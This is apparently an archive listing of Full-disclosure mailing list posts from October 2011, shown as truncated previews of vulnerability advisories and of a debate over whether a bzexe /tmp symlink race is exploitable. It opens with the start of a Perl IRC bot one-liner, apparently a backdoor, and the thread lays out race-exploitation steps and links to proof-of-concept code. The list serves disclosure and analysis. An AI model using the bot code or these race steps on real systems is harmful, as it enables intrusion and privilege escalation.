Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-27 Thread rancor
#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($

Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

2011-10-27 Thread information security
So will this be considered a vulnerability or not? Because successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account. Asheesh On Wed, Oct 26, 2011 at 5:55 AM, Darren McDonald wrote: > I think

[Full-disclosure] DDIVRT-2011-35 Cisco Unified Contact Center Express Directory Traversal [CVE-2011-3315]

2011-10-27 Thread ddivulnalert
Title - DDIVRT-2011-35 Cisco Unified Contact Center Express Directory Traversal [CVE-2011-3315] Severity High Date Discovered --- August 9, 2011 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: r@b13$ Vulnerability Description -

[Full-disclosure] foofus.net security advisory - Toshiba eStudio Multifunction Printer Information Leakage

2011-10-27 Thread dh
Foofus.net Security Advisory: foofus-20111026 Title:Toshiba eStudio Multifunction Printer Information Leakage Version: e-Studio seri

[Full-disclosure] [SECURITY] [DSA 2329-1] torque security update

2011-10-27 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2329-1secur...@debian.org http://www.debian.org/security/ Nico Golde Oct 27th, 2011

[Full-disclosure] SANS AppSec 2012 CFP is Open

2011-10-27 Thread SANS AppSec CFP
Hi everyone, We're happy to announce that the sixth annual SANS AppSec Summit will be held in Las Vegas, Nevada on April 30 - May 1, 2012. The theme for this conference is "Application Security at Scale". Billions of records in the cloud. Millions of smart mobile devices. Millions of developer

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread vladz
This vulnerability is trivial and I don't even know why it is making so much noise as bzexe is almost never used and the exploit would only work under certain circumstances. I quoted it because it was an example of insecure uses of "/tmp", that's all! Note for "xD 0x41": before you say somethi

Re: [Full-disclosure] noise: Possible skydrive link to gov

2011-10-27 Thread Zachary Hanna
Skydrive is the Microsoft cloud storage product, for documents, pictures, etc. It is similar to Dropbox, which is already a well-known LE intel source. From: xD 0x41 mailto:sec...@gmail.com>> Reply-To: "sec...@gmail.com" mailto:sec...@gmail.com>> Date: Wed, 26 Oct 2011

[Full-disclosure] Facebook Attach EXE Vulnerability

2011-10-27 Thread Nathan Power
- 1. Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this sec

[Full-disclosure] nullcon Goa 2012 Final call for Paper/Events and First round of speakers

2011-10-27 Thread nullcon
Hi All, nullcon team is pleased to announce: - First round of speakers - JailBreak - Final Call for Events and Call for Papers for Goa 2012 First round of speakers: 1. Charlie Miller - Breaking iOS Code Signing 2. Atul Alex - Binary God: Custom Abstract

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread xD 0x41
Vlad, I won't repeat myself, again, your PoC will NOT work. It will NOT get root anything! Please, understand it, and maybe, make a working PoC, then see why... It was shown clearly by 2 people or more that it cannot work. If you can do better, and, sure, do what you said which is exact area whe

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread xD 0x41
BTE, exploits launched and ran from root, or even have anything to do with being near root dir, is not really what I'd call a userland PoC. So, stop convincing me that you can exploit root, and look back a few examples, which show your cmd as user failing... and, if you say it cannot be any cleare

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Jeffrey Walton
On Thu, Oct 27, 2011 at 9:43 AM, xD 0x41 wrote: > [SNIP] > > This means that right after the "ln" command AND before "/tmp/dd" is > launched, the user can replace the directory "/tmp/dd" by a shell script > with the same name ("/tmp/dd"). > > You try to change and fiddle here, it would need alot b

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread xD 0x41
Oh man that's an awesome paper... I love to read tavs stuff but, yea...hmmm. I also PMd vlad, and, exactly showed him, it is same place where it is failing, well, when it comes to clipping in the shell, exactly, it even complains on removing a file, yet this is also, in its code :s so, something is

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Valdis . Kletnieks
On Fri, 28 Oct 2011 00:56:35 +1100, xD 0x41 said: > morning but, i trust you, it cannot be exploited, in any way, it will > only cause corruption of tar and compression utils, at most. Umm. Maybe in *that step* it's "at most". But what can you leverage that into? If you can screw with the code ex

Re: [Full-disclosure] [foofus-tools] discontinued?

2011-10-27 Thread GloW - XD
naw we fuckin hate windows it sucks. On 27 October 2011 19:20, Kristen Eisenberg wrote: > Hi guys, well first of all thanx for building a tool like fgdump :) > but i'm worried, since 2k8 there is no update and it would be very sad > if it's discontinued... are you planning another release? > Kri

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread xD 0x41
I would like to see this. As I simply see no way it can be won. And, why share the details with one side only? A bit biased. I don't believe you are winning 60% of the time at all. I think you're also, full of bs. :) have a nice day. On 28 October 2011 01:20, wrote: > Hi, > > I've gotten this exploi

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread bugs
Hi, I've gotten this exploit to work, albeit on a slow 500 MHz system with 256 MB of RAM. I've shared the details with vladz and will make them available soon. It's a hard race to win, but it can be won about 60% of the time. > On Fri, 28 Oct 2011 00:56:35 +1100, xD 0x41 said: > >> morning but, i

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Benjamin Renaut
Imagine the following scenario: - You create /tmp/ (a directory) - Root is launching a bzexe-d binary (). - The ln done by bzexe results in the link being created inside /tmp/ (your directory), as explained by Vlad. - Before the bzexe shell script executes /tmp/, you remove your directory (/tmp/

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread bugs
Hi, > Also, i mean an up to date, 2011 kernel here, not some shitty old root@b0rk:/root# uname -a Linux b0rk 2.6.24-29-generic #1 SMP Wed Aug 10 16:34:32 UTC 2011 i686 GNU/Linux > crapbox... i dont care for hardware but, if your shooting from root > like vlads examples, and, look, I have discuss

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Valdis . Kletnieks
On Thu, 27 Oct 2011 09:51:33 EDT, Jeffrey Walton said: > On Thu, Oct 27, 2011 at 9:43 AM, xD 0x41 wrote: > > You try to change and fiddle here, it would need a lot better than just > > the current shell scripting, and, even then, i don't think it would win > > the race condition. > See Bishop and D

Re: [Full-disclosure] [foofus-tools] discontinued?

2011-10-27 Thread Christian Sciberras
Sounds like someone can't get enough flamewar. /eot On Thu, Oct 27, 2011 at 4:20 PM, GloW - XD wrote: > naw we fuckin hate windows it sucks. > > > On 27 October 2011 19:20, Kristen Eisenberg > wrote: > > Hi guys, well first of all thanx for building a tool like fgdump :) > > but i'm

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Benjamin Renaut
I just wrote a quick PoC for this (warning: didn't test the code a lot): http://pastebin.com/FaaEsXRW (compile that with -O3). Successfully tried it on my machine (Debian stable, amd64, high-end laptop). It probably has more chances of success on low-end hardware, or if the system is busy. If y

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Valdis . Kletnieks
On Thu, 27 Oct 2011 10:39:46 EDT, somebody before b...@fbi.dhs.org said: > > I still think it's crap anyhow, so, enjoy your 60% chance sploit on, > > what's not going to be a recent 2011 kernel :) Whoever wrote this should stop and ponder a bit - how does the kernel release enter into it? The explo

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Benjamin Renaut
Thanks ! Mine is definitely not more refined, it simply does the same ;-) the only advantage I see is that it's written in C and will probably run faster - giving it more chances of success. On 27/10/11 17:12, b...@fbi.dhs.org wrote: > my notes/exploit: > > http://www.downspout.org/?q=node/7 > >

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread bugs
my notes/exploit: http://www.downspout.org/?q=node/7 I am sure yours is more refined than mine. > I just wrote a quick PoC for this (warning: didn't test the code a lot): > > http://pastebin.com/FaaEsXRW > > (compile that with -O3). > successfully tried it on my machine (Debian stable, amd64, h

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread bugs
> Thanks ! > > Mine is definitely not more refined, it simply does the same ;-) > the only advantage I see is that it's written in C and will probably run > faster - giving it more chances of success. Yes, I suspect your success rate will be much better than mine. =-) > > On 27/10/11 17:12, b...

[Full-disclosure] Xorg file permission change PoC (CVE-2011-4029)

2011-10-27 Thread vladz
Hi list, A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch o

Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

2011-10-27 Thread yersinia
On Tue, Oct 25, 2011 at 8:26 PM, information security < informationhacke...@gmail.com> wrote: > > == > > Microsoft Outlook Web Access Session > sidejacking/Session Replay Vulnerability > > ===

Re: [Full-disclosure] [foofus-tools] discontinued?

2011-10-27 Thread winsoc
The fgdump is backdoored. Kristen - thank you for your bases. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 27 October 2011 15:51 To: GloW - XD Cc: Kristen Eisenberg; full-disclosure@lists.grok.org.uk Subject

Re: [Full-disclosure] [foofus-tools] discontinued?

2011-10-27 Thread Dan Dart
s/flamewar/truth/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Andrew Farmer
On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote: > The other thing that people need to remember is that there's no race condition > that's so small that you can't hit it. If there's a race condition, it *can* > be won. And systems like inotify make filesystem races trivial to win. I wouldn

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread vladz
On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote: > http://pastebin.com/FaaEsXRW Nice thing, but for sure, it can be optimized. For example, to save time, I would suggest you use rename() instead of using both unlink() and rmdir() functions. Same thing for your write_shellco

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Valdis . Kletnieks
On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said: > And systems like inotify make filesystem races trivial to win. I > wouldn't be surprised if you could win this particular race reliably by > watching for the files bzexe drops and acting immediately when they show > up. Good point. That actu

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Benjamin Renaut
On 27/10/11 19:34, vladz wrote: > Nice thing, but for sure, it can be optimized. For example, to save > time, I would suggest you use rename() instead of using both > unlink() and rmdir() functions. Same thing for your write_shellcode() > function, it contains too many calls. It would be pref

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread halfdog
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andrew Farmer wrote: > On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote: >> The other thing that people need to remember is that there's no >> race condition that's so small that you can't hit it. If there's >> a race condition, it *can* be won.

[Full-disclosure] ZDI-11-311 : Apple Quicktime Empty URL Data Handler Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-311 : Apple Quicktime Empty URL Data Handler Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-311 October 27, 2011 -- CVE ID: CVE-2011-3220 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

[Full-disclosure] ZDI-11-313 : Apple QuickTime FLC RLE Packet Count Decompression Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-313 : Apple QuickTime FLC RLE Packet Count Decompression Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-313 October 27, 2011 -- CVE ID: CVE-2011-3223 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple

[Full-disclosure] ZDI-11-312 : Apple QuickTime Atom Hierarachy Argument Size Mismatch Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-312 : Apple QuickTime Atom Hierarachy Argument Size Mismatch Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-312 October 27, 2011 -- CVE ID: CVE-2011-3221 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products:

[Full-disclosure] ZDI-11-314 : Apple Quicktime PnPixPat PatType 3 Parsing Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-314 : Apple Quicktime PnPixPat PatType 3 Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-314 October 27, 2011 -- CVE ID: CVE-2011-3247 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Quickt

[Full-disclosure] ZDI-11-315 : Apple QuickTime FLC Delta Decompression Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-315 : Apple QuickTime FLC Delta Decompression Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-315 October 27, 2011 -- CVE ID: CVE-2011-3249 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

[Full-disclosure] ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability

2011-10-27 Thread ZDI Disclosures
ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-316 October 27, 2011 -- CVE ID: CVE-2011-3251 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

Re: [Full-disclosure] Facebook Attach EXE Vulnerability

2011-10-27 Thread Joshua Thomas
Can't believe such was on FB wahahaha !!! lol rofl ... When was this discovered and fixed? On Thu, Oct 27, 2011 at 1:02 AM, Nathan Power wrote: > > - > 1. Summary: > > When using the Facebook 'Messages' t

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread GloW - XD
Yes... even adding a cron entry is possible if done right ;) On 28 October 2011 04:51, wrote: > On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said: >> And systems like inotify make filesystem races trivial to win. I >> wouldn't be surprised if you could win this particular race reliably by >>

Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread xD 0x41
I love this, your stuff's always impressing me.. I have too much work on atm, (specially since I'm doing a hand in your old P3 or P4 for a spankin' new IBM NetVista P4 dual-CPU!) that was a mistake :s but, I will see what others in my channel think, I will post the tool and mark it as interest, and see wha

[Full-disclosure] VMSA-2011-0013 VMware third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX

2011-10-27 Thread VMware Security Response Team
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2011-0013 Synopsis:VMware third party component updates for VMware vCenter Server, vCenter U